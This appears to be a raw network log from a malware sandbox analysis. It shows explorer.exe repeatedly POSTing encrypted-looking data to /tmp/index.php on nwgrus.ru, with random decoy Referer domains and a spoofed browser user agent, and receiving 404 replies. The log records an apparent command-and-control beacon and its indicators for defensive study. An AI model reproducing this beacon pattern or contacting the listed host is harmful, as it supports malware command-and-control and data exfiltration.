                                                          25192.168.2.449796190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:03.473176003 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://nfmmhijnsahycef.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 241
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:03.473217010 CEST241OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5d 0e d6 fb
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu] AgvP*FfPB/_}JG$(S5x/97(b.L$l _|o6KXqEeB\SAAvA,z
                                                          Oct 12, 2024 22:29:04.555243969 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:04 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.449802190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:05.088399887 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://gmtmmuxeespeb.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 333
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:05.088399887 CEST333OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 5d 57 d5 e2
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu]WR2s*wd2p*PVUf[":o;I&YLS9)wCE;O/<zc@?D*L"lp|_:ck-2_
                                                          Oct 12, 2024 22:29:06.138050079 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:05 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.449808190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:06.148591042 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://oetcuqsferjcffw.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 164
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:06.148591042 CEST164OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 70 5d a0 eb
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vup]H`DtNYRXC1YGpI8~7.:Uc5"I?E
                                                          Oct 12, 2024 22:29:07.234761000 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:07 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.449819190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:07.251553059 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ykmrlqvmvtweyurg.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 294
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:07.251590967 CEST294OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 57 42 c8 ec
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuWB7|x"_MQz`Y?a}QDn'L5)\/#WW@1"cvH\_tZeH|C3bs{^xH?n
                                                          Oct 12, 2024 22:29:08.323353052 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:08 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.449825190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:08.337567091 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://htfrpafyilhcsfrb.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 130
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:08.337567091 CEST130OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 4e 07 b4 b6
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuN\AM)nLZrB a[3
                                                          Oct 12, 2024 22:29:09.404885054 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:09 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.449832190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:09.419826984 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://uphnbpophmmckayq.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 322
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:09.419826984 CEST322OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 67 03 ca fe
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vugm<Fu<q:W*{-emF,N$e.\%Az&W(sOzMT&dN^F:#?gk@,Kd{54
                                                          Oct 12, 2024 22:29:10.496790886 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:10 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.449841190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:10.510524988 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://wygnfgjkntpabtiq.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 258
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:10.510557890 CEST258OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 38 15 a8 a9
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu8u7Kquro'AF>S?/J+m0;#[*9BD%rN9K]c@yaY&uoO.
                                                          Oct 12, 2024 22:29:11.566257000 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:11 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.449847190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:11.593549013 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://vhkqchnxwnhum.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 308
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:11.593636990 CEST308OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 52 0a aa f7
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuRQSbao'R4RFJFJ\_KP[0PD+0lPAB3y`|RzXV@aHKYZIeg{">Ib
                                                          Oct 12, 2024 22:29:12.657061100 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:12 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.449853190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:12.673738956 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://nscyrydfuavfv.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 213
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:12.673738956 CEST213OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 52 28 ba fe
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuR(eghpl|e]'[FB=\6`=M>[7$Nc3-/Z7AL'EG/sSRq>j
                                                          Oct 12, 2024 22:29:13.772727013 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:13 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
